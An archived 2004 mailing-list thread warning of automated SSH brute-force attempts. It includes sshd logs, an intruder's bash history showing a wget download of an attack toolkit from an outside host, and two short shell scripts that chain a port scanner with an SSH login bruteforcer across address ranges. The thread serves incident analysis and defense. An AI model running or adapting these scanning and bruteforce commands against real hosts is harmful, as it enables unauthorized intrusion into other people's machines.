[SLL] Heads up: brute force ssh attacks

Paul paul at oz.net
Thu Jul 29 18:22:34 EDT 2004 

There's been a lot of brute force login attempts
this week to sshd and a few other services (ftp) coming
from all over the world.  Good time to make sure you are
up to date with your openssh patches and/or have ssh
allowed only from specific IPs.  You did use good
passwords, no? :)

I'm enclosing the email that started the thread
and two others that shed light on the activity below.

-- Paul

-----------------------------------------------------------
 Date: Thu, 22 Jul 2004 10:47:46 -0400 (EDT)
 From: Jay Libove <libove at felines.org>
 To: full-disclosure at lists.netsys.com, vulnwatch at vulnwatch.org
 Subject: [Full-Disclosure] Automated SSH login attempts?

[ Posted to full disclosure and vulnwatch;  please edit reply address(es)
as appropriate. Thanks. -Jay ]

My Linux system, and a Linux system run by a friend here in the same city
but on a completely different netblock (different ISP), have both seen
apparently automated attempts to log in to our systems via SSH in the past
few days.  Looks like a script.


Here are some log entries from my system:

Jul 15 10:01:34 panther6 sshd[8267]: Illegal user test from 62.67.45.4
Jul 15 10:01:34 panther6 sshd[8267]: Failed password for illegal user test from 62.67.45.4 port 39141 ssh2
Jul 15 10:01:36 panther6 sshd[8269]: Illegal user guest from 62.67.45.4
Jul 15 10:01:36 panther6 sshd[8269]: Failed password for illegal user guest from 62.67.45.4 port 39192 ssh2
Jul 15 10:01:37 panther6 sshd[8271]: Illegal user admin from 62.67.45.4
Jul 15 10:01:37 panther6 sshd[8271]: Failed password for illegal user admin from 62.67.45.4 port 39234 ssh2
Jul 15 10:01:38 panther6 sshd[8273]: Illegal user user from 62.67.45.4
Jul 15 10:01:38 panther6 sshd[8273]: Failed password for illegal user user from 62.67.45.4 port 39275 ssh2
Jul 15 10:01:39 panther6 sshd[8275]: Failed password for root from 62.67.45.4 port 39340 ssh2
Jul 15 10:01:41 panther6 sshd[8277]: Failed password for root from 62.67.45.4 port 39386 ssh2
[stuff deleted]

 .. and some log entries from my friend's system:

Jul 19 21:04:33 quack sshd[28379]: Illegal user test from 131.234.157.10
Jul 19 21:04:34 quack sshd[28381]: Illegal user guest from 131.234.157.10
Jul 19 21:04:36 quack sshd[28383]: Illegal user admin from 131.234.157.10
Jul 19 21:04:37 quack sshd[28385]: Illegal user admin from 131.234.157.10
Jul 19 21:04:38 quack sshd[28387]: Illegal user user from 131.234.157.10
Jul 19 21:04:43 quack sshd[28400]: Illegal user test from 131.234.157.10
Jul 22 09:39:10 quack sshd[7646]: Illegal user test from 156.17.99.11
Jul 22 09:39:11 quack sshd[7648]: Illegal user guest from 156.17.99.11


I have not seen any notes about this on the vulnerability disucssion
lists.  Has anyone else noticed it?  What specific vulnerability (or
default password?) is this looking for?

-Jay Libove, CISSP
libove at felines.org
Atlanta, GA US

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 Date: Thu, 29 Jul 2004 18:38:15 +0200
 From: Stefan Janecek <stefan.janecek at jku.at>
 To: full-disclosure at lists.netsys.com
 Subject: [Full-Disclosure] Re: Automated SSH login attempts?

Hmmm - I have also been getting those login attemps, but thought them to
be harmless. Maybe they are not *that* harmless, though... Today I
managed to get my hands on a machine that was originating such login
attempts. I must admit I am far from being a linux security expert, but
this is what I've found out up to now:

Whoever broke into the machine did not take any attempts to cover up his
tracks - this is what I found in /root/.bash_history:

------
id
uname -a
w
id
ls
wgte frauder.us/linux/ssh.tgz
wget frauder.us/linux/ssh.tgz
tar xzvf ssh.tgz
tar xvf ssh.tgz
ls
cd ssh
ls
./go.sh 195.178
ls
pico uniq.txt
vi uniq.txt
ls
rm -rf uniq.txt
./go.sh 167.205
ls
rm -rf uniq.txt  vuln.txt
./go.sh 202.148.20
./go.sh 212.92
./go.sh 195.197
./go.sh 147.32
./go.sh 213.168
./go.sh 134.176
./go.sh 195.83
------

um-hum. I downloaded 'ssh.tgz', it contains the script go.sh and two
binaries:

go.sh:
-------
./ss 22 -b $1 -i eth0 -s 6
cat bios.txt |sort | uniq > uniq.txt
./sshf
-------

* 'ss' apparently is some sort of portscanner
* 'sshf' connects to every IP in uniq.txt and tries to log in as user
'test' first, then as user 'guest' (according to tcpdump).

This does not seem to be a stupid brute force attack, as there is only
one login attempt per user. Could it be that the tool tries to exploit
some vulnerability in the sshd, and just tries to look harmless by using
'test' and 'guest' as usernames?

The compromised machine was running an old debian woody installation
which had not been upgraded for at least one year, the sshd version
string says 'OpenSSH_3.6.1p2 Debian 1:3.6.1p2-10'

As already mentioned, I am far from being an expert, but if I can assist
in further testing, then let me know. Please CC me, I am not subscribed
to the list.

cheers,
Stefan

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 Date: Thu, 29 Jul 2004 08:05:45 +0200
 From: Jerome <jethro at docisland.org>
 To: full-disclosure at lists.netsys.com
 Subject: [Full-Disclosure] about the automated ssh login attempts


Hi list,

setting up a honeypot, I was able to identify some of the activity
associated with these login attempts.
after the honeypot's been probed for guest and test login, I had someone
login as test and fetch some tools from websites to use them on the
honeypot.

tools were fetched from some .ro website as per .bash_history and
captured keystrokes.

the toolkit I had the opportunity to have downloaded by the kid on the
honeypot was made of a bunch of components:

- ss : a copy of the "very fast" syn scanner by haitateam published
  latetly, at least on packetstorm

- haita: apparently the tool used to bruteforce accounts

	strings -a haita | grep SSH
	SSH login bruteforcer by HaitaTeam

	*tho* guest and test accounts seem hardcoded, so unless they fix
	that, it's not gonna be a big threat for all of the other joes
	accounts around.

and the final part:

- scan.sh: which is the kiddie's best friend for using these 2 tools
  altogether:

#!/bin/sh
if [ $# != 1 ]
then
	echo "Se da asa:"
	echo "$0 <clasa b>"
	echo "Exemplu:"
	echo "$0 212.93"
	echo "Daca nu prindeti ... verificati in fisieru \
asta sa fie pusa placa de retea care trebe adika \
eth0, eth1, ppp0 etc "

	exit
fi
rm -f bios.txt vuln.txt uniq.txt
./ss 22 -b $1 -i eth0 -s 6
cat bios.txt |sort | uniq > uniq.txt
./haita

I also had some other toolkits on the honeypot after the breakin, most
of them being local root exploits packed in a single archive, and some
massrooter for years old remote vulnerabilities, but we all know them.

I can provide with the bins if anyone's interested, but didn't bother
yet to place them on some website, feel free to email.

cheers,

-- 
Jerome
[pgp keyid : 33D7802F http://pgp.mit.edu]
[key fingerprint : 82E6 C9C8 05D1 BEAC 9353  8ECB CEAF 6A0A 33D7 802F]

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

More information about the linux-list mailing list